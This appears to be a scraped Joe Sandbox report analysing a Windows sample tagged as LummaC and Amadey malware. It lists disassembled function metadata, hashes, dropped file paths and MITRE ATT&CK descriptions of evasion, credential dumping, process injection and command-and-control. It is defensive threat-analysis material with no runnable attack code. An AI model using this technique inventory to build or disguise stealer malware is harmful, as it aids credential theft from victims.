EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0030DEAD,?,?,00000000,00000000,00000000,?), ref: 0030DFD1

Strings

MOC, xrefs: 0030DFE3
RCC, xrefs: 0030DFEB

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 633bca1072d04d981bc78cccbbb84780875a5c131cdbd29a823fac0bc1002ddb
Instruction ID: f0ea04f244b9e62f37153d36158bc0eac0f5bc2608150383145471c65d2cbeae
Opcode Fuzzy Hash: 633bca1072d04d981bc78cccbbb84780875a5c131cdbd29a823fac0bc1002ddb
Instruction Fuzzy Hash: AF417971A01209AFCF26DF98CC91AEEBBB5FF48300F198499FA046B2A1D3759950DB50

Function 00311E7B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0030E4F7: HeapFree.KERNEL32(00000000,00000000,?,00311A55,?,00000000,?,?,003116F5,?,00000007,?,?,0031203B,?,?), ref: 0030E50D
Part of subcall function 0030E4F7: GetLastError.KERNEL32(?,?,00311A55,?,00000000,?,?,003116F5,?,00000007,?,?,0031203B,?,?), ref: 0030E518

___free_lconv_mon.LIBCMT ref: 00311EBF

Strings

8Z2, xrefs: 00311F67
TY2, xrefs: 00311E91

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: ErrorFreeHeapLast___free_lconv_mon
String ID: 8Z2$TY2
API String ID: 4068849827-2539650468
Opcode ID: 30bbb67b2d520e5614ef0bfd167eb1522e80348d6a1faa62e514cf883f1cf770
Instruction ID: b9be006d7786d98f67b6face6aa2fa1217772dcd6f916d28aa1ad2e2c98f8de4
Opcode Fuzzy Hash: 30bbb67b2d520e5614ef0bfd167eb1522e80348d6a1faa62e514cf883f1cf770
Instruction Fuzzy Hash: 1D318F326006019FDB27AAB9D849BEA77E8AF08750F114D1AF955DB191DF75EC80CB20

Function 0030D818 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0030DA8F

Strings

csm, xrefs: 0030DB22
csm, xrefs: 0030DAB1

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: aeac2d92946b5f346c69a893a4f7f80cc0a708582f813b425ff8a5af73e789f4
Instruction ID: 24a7bc546ff9af1591341248f16155ae0127b69003cf0fe8bfc760da62370d9f
Opcode Fuzzy Hash: aeac2d92946b5f346c69a893a4f7f80cc0a708582f813b425ff8a5af73e789f4
Instruction Fuzzy Hash: 9F31F336502208EBCF239FD4CC609AA7BE5FF08365B1A415AF8444A2A1C332CCA1DB91

Function 003029C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00304B74
___raise_securityfailure.LIBCMT ref: 00304C5C

Strings

xf2, xrefs: 00304C57

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: xf2
API String ID: 3761405300-1590918491
Opcode ID: 84585af63b49aa6710656a75a46e758a9db7882156c3996ac6b2533ca4204266
Instruction ID: ea2c7a8539363f1546018f99ebeafb6eeace2450610443b5316ad4b8911152b2
Opcode Fuzzy Hash: 84585af63b49aa6710656a75a46e758a9db7882156c3996ac6b2533ca4204266
Instruction Fuzzy Hash: 0621BFB4541300DAE723CF29F9966543BF8FF48718F10612EE9048A2A0E3B15986DB44

Function 00304A8C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00304A97
___raise_securityfailure.LIBCMT ref: 00304B54

Strings

xf2, xrefs: 00304B4F

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: xf2
API String ID: 3761405300-1590918491
Opcode ID: 611dbe36683ec1b0f4f88a03d0e4ebdd5b6febd4584e0c839e3d964005abcb53
Instruction ID: 9eb0d07a70c95843920220455471552130a53f8ec46d345d26f1bd963ca0b537
Opcode Fuzzy Hash: 611dbe36683ec1b0f4f88a03d0e4ebdd5b6febd4584e0c839e3d964005abcb53
Instruction Fuzzy Hash: 5F116CB4552344DBD723DF29F9926407BB8FF58308F01A16EE908873A0E7719946DF45

Function 003029D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(0032648C,ios_base::badbit set,?,?,00301C84,00326478,00301B17), ref: 003029DF
ReleaseSRWLockExclusive.KERNEL32(0032648C,?,?,00301C84,00326478,00301B17), ref: 00302A19

Strings

ios_base::badbit set, xrefs: 003029D8

Memory Dump Source

Source File: 0000000E.00000002.2164116534.0000000000301000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00300000, based on PE: true

Associated: 0000000E.00000002.2164078540.0000000000300000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164179880.000000000031C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164229591.0000000000325000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164268142.0000000000328000.00000020.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164316693.000000000032A000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000E.00000002.2164364938.000000000032D000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_300000_3a1a782de7.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: ios_base::badbit set
API String ID: 17069307-3882152299
Opcode ID: 4148ad074840843b59bcc0f7f1d684fb981f023c2d103b2dae19abdd5175bb53
Instruction ID: 5991af2d62799fea7c75a8e013fb758f751fdd5974c7004a47cbe0076c2eb9ad
Opcode Fuzzy Hash: 4148ad074840843b59bcc0f7f1d684fb981f023c2d103b2dae19abdd5175bb53
Instruction Fuzzy Hash: 54F08C34602240CBC732AF19E819A26BBACFB85734F10032EE89A436E0CB352942CB51

Function 0040B9E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00408A1C), ref: 0040B9E6
FreeLibrary.KERNEL32 ref: 0040BA07

Strings

Wu, xrefs: 0040B9E6, 0040BA07

Memory Dump Source

Source File: 0000000E.00000002.2164467290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_3a1a782de7.jbxd

Similarity

API ID: FreeLibrary
String ID: Wu
API String ID: 3664257935-4083010176
Opcode ID: 7c54cb469457635f36ad0ae8b4914aa2b457e5d6445ebac04a39c07ed6b78a77
Instruction ID: 23a19cfd90755bc3f012e3213f5be6af889070350e8c7cc38b3ff011247ab6d8
Opcode Fuzzy Hash: 7c54cb469457635f36ad0ae8b4914aa2b457e5d6445ebac04a39c07ed6b78a77
Instruction Fuzzy Hash: 51C00279419401AFCE017B61FC199283A21BB563457050834E51990236DB2A0927DB2E

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Bitcoin Miner

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[2].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe

C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe

Windows Analysis Report
file.exe

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre